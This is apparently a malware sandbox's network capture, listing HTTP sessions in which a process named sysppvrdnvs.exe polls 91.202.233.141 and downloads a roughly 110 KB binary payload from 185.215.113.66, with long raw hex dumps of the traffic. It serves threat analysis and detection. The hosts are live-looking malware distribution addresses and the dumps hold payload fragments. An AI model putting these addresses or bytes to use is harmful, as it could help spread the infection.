                                                                                                                                                                                                    Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823448896 CEST112INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                                    Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823462009 CEST1236INData Raw: 9d ff ac 13 26 cb c9 21 3e dc d3 64 1f d4 fb 4b 2a 40 8a 9e 69 9c d7 88 b8 5b ba c3 f7 ae fa 88 5d de c1 ac aa e1 e0 7f f9 4c 06 c4 b9 fd f1 eb f2 cd ac 0e 84 7a 41 29 30 a1 85 dc 4e 24 80 77 81 7c 09 6e c7 f7 3d c9 cb d6 be 92 8b ff d2 c8 cc 02
                                                                                                                                                                                                    Data Ascii: &!>dK*@i[]LzA)0N$w|n=29-BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823534012 CEST1236INData Raw: 6e 13 33 1e c3 06 07 53 0b e8 41 8d 1f 42 91 8b 82 43 9f 77 81 4a 94 9c 76 1a e8 31 9f b1 e0 73 3e 70 96 a2 ea 73 c5 8b 66 f8 79 fb 7f 98 cd d3 46 4f 43 d6 fa 08 48 69 5f 52 f5 37 ae 12 d5 96 02 02 f0 47 80 8e 4c a4 e5 c7 2e 97 a7 c8 40 e5 5d ee
                                                                                                                                                                                                    Data Ascii: n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s']@-:N=rMvVyI7:%MZ}a OaYrPQ;|<5c0aFh){
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823546886 CEST1236INData Raw: 10 ed 29 9e 49 cc d6 c2 1b b7 a4 91 44 a7 e6 56 12 05 30 8f f2 5d d9 97 44 fb fe cb f5 9a 98 09 8c 5e 62 42 e8 56 db 7f 7d bc 12 5d 00 49 af ea e1 9b 1b 16 26 09 d2 73 9c dc 9e 73 f2 fb fd d2 64 77 9d b0 be db 2e 24 95 df c9 fb d1 f2 6e d2 65 c4
                                                                                                                                                                                                    Data Ascii: )IDV0]D^bBV}]I&ssdw.$ne1UM?tIC(`mCy`OG*Kz8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpT
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823596954 CEST636INData Raw: 80 02 a6 34 02 a7 6f b1 a4 1d 0c a0 b3 13 e9 58 d7 d8 22 e3 1a 9f 6a a0 29 a3 68 61 2d d4 f5 4e c3 ff ac ef 37 7b a1 15 8a fb 68 ce 0c 7c db 73 ce f1 5b 95 58 21 b6 88 9b 60 7e 76 11 91 99 1a 7a 24 ed 36 c4 c4 62 31 e0 1c 11 0e 85 6f 02 71 55 58
                                                                                                                                                                                                    Data Ascii: 4oX"j)ha-N7{h|s[X!`~vz$6b1oqUXH10>&{gJ.pSmw2X}g|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823611021 CEST1236INData Raw: 38 5b c8 5d 8c 1b 4d f0 d1 6d 1d 1e 7e b8 48 f3 13 73 6b 32 13 33 7b 9a a5 0f 96 7c d8 10 ff 44 91 37 f7 27 0a b2 c5 02 33 2d 4c 12 b4 3f 80 ff 51 1d 2a 88 77 8e f8 8f 41 48 2d 2d 90 cf 47 37 ee cc 7c 4c e8 f9 8b 30 50 5d 28 53 3f b9 a5 a1 e1 e0
                                                                                                                                                                                                    Data Ascii: 8[]Mm~Hsk23{|D7'3-L?Q*wAH--G7|L0P](S?UvgvCF70H.s&46Ha)\$!w"p(4K8jf=u;@$8Mmo(J4k8G*ncP=-jE@kzU9
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823623896 CEST1236INData Raw: 90 01 51 2b 23 a0 8d 0b 7c f6 b2 52 b0 54 3c ea b6 fe f2 56 f2 97 f9 66 0d 3a 0c 09 da 5d a0 7d b1 4e 0a 0b 60 50 7e 7c f5 d0 4e 68 95 b5 e8 fa 1c e0 a7 2d a0 df d5 7b 39 90 7b 53 fe 97 35 08 d0 92 a5 9b a0 91 55 47 ae 1f d7 ae ed 09 8e 2c d7 42
                                                                                                                                                                                                    Data Ascii: Q+#|RT<Vf:]}N`P~|Nh-{9{S5UG,BkTT*wv}b&#T%[*<9CVd>UkdiqB/bgW^2'N+SN*8s67H_qigq~+3s3p}U,
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823637962 CEST424INData Raw: 0f 9e 83 d6 b9 2e d5 f7 01 12 84 e3 1b 6e e4 43 19 c0 68 3c 9c 48 13 66 9f 7b 77 dd 47 41 4f cc fa 23 4e 14 97 51 c9 98 16 67 6f c9 be d6 81 80 eb 3d 7c 03 a0 39 36 ed 44 e2 9d d1 fb 26 46 c9 8d 91 e2 c8 49 6d 69 97 58 25 ce f1 66 e6 65 0b 92 e6
                                                                                                                                                                                                    Data Ascii: .nCh<Hf{wGAO#NQgo=|96D&FImiX%feP:Ahg83Hn!cqiW3a{;<jJi.4nQ^tg61lAJN>n}xp<^;<3h;N2#8+x.>JK)X-B
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.823652029 CEST1236INData Raw: 2e dd 9e e9 55 8a 4e 4f af 68 02 dd 6e 93 97 ef 3f 02 1c 7d 90 e4 29 55 51 cc f4 d5 6e 7b 33 76 40 a1 25 d7 3c 0b 07 b8 dd f9 b8 f7 09 73 b1 42 d2 69 10 ba 4d 0c 9b 8b d4 d5 01 50 0d fe 09 d5 d0 6b e2 21 cf 15 28 20 72 f7 fc 57 4f 73 94 ca 76 b0
                                                                                                                                                                                                    Data Ascii: .UNOhn?})UQn{3v@%<sBiMPk!( rWOsv</Es^Wi<x-vL-B'eo/d12 `g:uBO4O}~rzd'()%_JIoC_^* L]C\N\p+lJh@g
                                                                                                                                                                                                    Oct 26, 2024 07:28:22.828934908 CEST1236INData Raw: ff 18 09 ed a7 60 40 3b 6e 04 1e 15 5a c7 6b 7a 83 1e a9 3b fa 04 27 95 4d f5 0d 4a ee 4a 92 1d 13 9f db 43 c7 58 b4 72 a8 56 6d 46 a1 7a 1a 48 eb ca 14 ae 88 86 9a b3 de b9 8b ec cb e3 62 05 fe 7f b9 42 0e 61 2d ad 12 06 26 54 54 d1 48 44 27 8e
                                                                                                                                                                                                    Data Ascii: `@;nZkz;'MJJCXrVmFzHbBa-&TTHD'Y,Nikm07<G/p{gT`:4H[~"{dVaZVVZgfiGi}Sd:&a\Z7a" ')\{*wcb<zo


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    26192.168.2.85458791.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:26.074594021 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:26.988121986 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:26 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    27192.168.2.85459791.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:29.393850088 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:30.262674093 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:30 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    28192.168.2.85459991.202.233.14180
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:32.357395887 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:33.292862892 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:33 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    29192.168.2.85460191.202.233.14180
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:35.413598061 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:36.304109097 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:36 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    30192.168.2.85460291.202.233.14180
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:38.405694962 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:39.349977016 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:39 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    31192.168.2.854604185.215.113.6680
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:42.641506910 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.540962934 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:43 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 110600
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a94a-1b008"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.540991068 CEST1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                                    Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541002035 CEST1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                                                                                    Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
